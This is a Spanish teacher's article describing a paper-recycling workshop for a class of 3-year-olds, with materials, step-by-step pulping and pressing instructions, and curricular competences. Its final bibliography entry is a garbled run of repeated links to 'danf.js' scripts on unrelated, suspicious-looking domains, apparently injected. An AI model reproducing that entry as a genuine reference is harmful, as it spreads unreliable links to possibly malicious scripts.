RECICLADO DE PAPEL: UNA EXPERIENCIA EN EL AULA DE EDUCACIÓN INFANTIL

Autora: María Isabel Gamero Pardo

La Educación Ambiental plantea nuevos retos para este siglo,

como potenciar procesos educativos participativos e interdisciplinares

que conduzcan hacia una educación socialmente crítica

y hacia un desarrollo sostenible en todos los ámbitos (Tilbury, 2000).

 

          El Proyecto “Ecocentros”  cuenta con la colaboración de las Consejerías de Educación, Ciencia y Tecnología, y de Agricultura y Medio Ambiente de la Junta de Extremadura. Este proyecto surge en el año 2001 en Extremadura con la intención de contribuir a mejorar el trabajo educativo ambiental desarrollado en los centros. “Ecocentros” se pone en marcha desde la Facultad de Formación del Profesorado de la Universidad de Extremadura (UEX) como un proyecto de investigación educativa.

          Teniendo esto en cuenta, uno de los talleres que nos hemos planteado en mi aula de 3 años  ha sido el “Taller de Reciclado de papel”, para lo que he contado con la colaboración de algunas de  las madres de mis alumnos.

          El taller lo voy a realizar durante el mes de mayo, coincidiendo con la Unidad Didáctica “Los medios de comunicación”. Me van a ayudar cinco madres que vendrán a la clase los jueves durante una hora, que es cuando se hará el taller.

          Material que necesitamos:

  • Babis de plástico.
  • Papel de desecho (folios usados o papel de periódico).
  • Barreño o cubeta honda.
  • Batidora.
  • Cernedores.
  • Filtros.
  • Prensa.
  • Tendedero y pinzas.

           Una vez que tenemos los materiales con los que vamos a trabajar, veremos cómo se realiza el proceso del reciclado:

  1. Se selecciona el papel, no usarlo con láminas de aluminio, tratamientos de cera o parafinas, aceite, plástico, etc.
  2. Se corta en pequeños trozos y se pone en remojo (aproximadamente unas 8 horas).
  3. Se bate, con la ayuda de las mamás. Debe quedar una papilla muy líquida, ya que sale el papel más fino.
  4. Se saca con el cernedor siguiendo cuatro pasos:
  • Se entra en vertical en la parte opuesta a la persona que lo realiza.
  • Se atrae hacia uno mismo bajando al centro de la cubeta.
  • Se pone en horizontal dentro de la mezcla.
  • Se sube en horizontal.

 

5. Se realiza fuera de la cubeta el escurrido del cernedor.

6. Se le pone un filtro encima (bien bayeta o papel de periódico) y se vuelca sobre él.

7. Se levanta el cernedor con cuidado y se coloca otro filtro encima.

8. Se prensa para quitar el agua y se tiende a escurrir.

Con el papel reciclado resultante podemos hacer actividades como:

  • Felicitaciones de navidad.
  • Las portadas de los trabajos.
  • Un cuento sobre el reciclaje con dibujos realizados por los niños.

 

Las Competencias Básicas que más podemos trabajar con esta experiencia son:

-         Competencia de aprender a aprender.

-         Competencia en la comunicación  lingüística.

-         Competencia en el conocimiento y la interacción con el mundo físico.

REFERENCIAS BIBLIOGRÁFICAS:

  •  LEY ORGÁNICA, 2/2006, de 3 de Mayo, de Educación, BOE, número 106 de 4/5/2006, páginas 17158 a 17207.
  • DECRETO 4/2008, de 11 de enero, por el que se aprueba el Currículo de Educación Infantil para la Comunidad Autónoma de Extremadura, DOE, 18 de enero de 2008, núm. 12, p.1226-1272.
  •   Tilbury, D., “Reconceptualizando la educación ambiental para un nuevo siglo”, Tópicos en Educación Ambiental, vol. 3. 2000.
  • Revista Ecocentros de Extremadura.
  •    http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&www.ecocentros.com

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.